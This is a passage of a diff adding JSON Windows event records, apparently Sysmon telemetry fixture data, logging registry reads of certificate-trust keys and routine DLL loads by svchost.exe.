"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ssdpapi.dll", + "image_path": "C:\\Windows\\System32\\ssdpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + 
"image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + 
"image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": 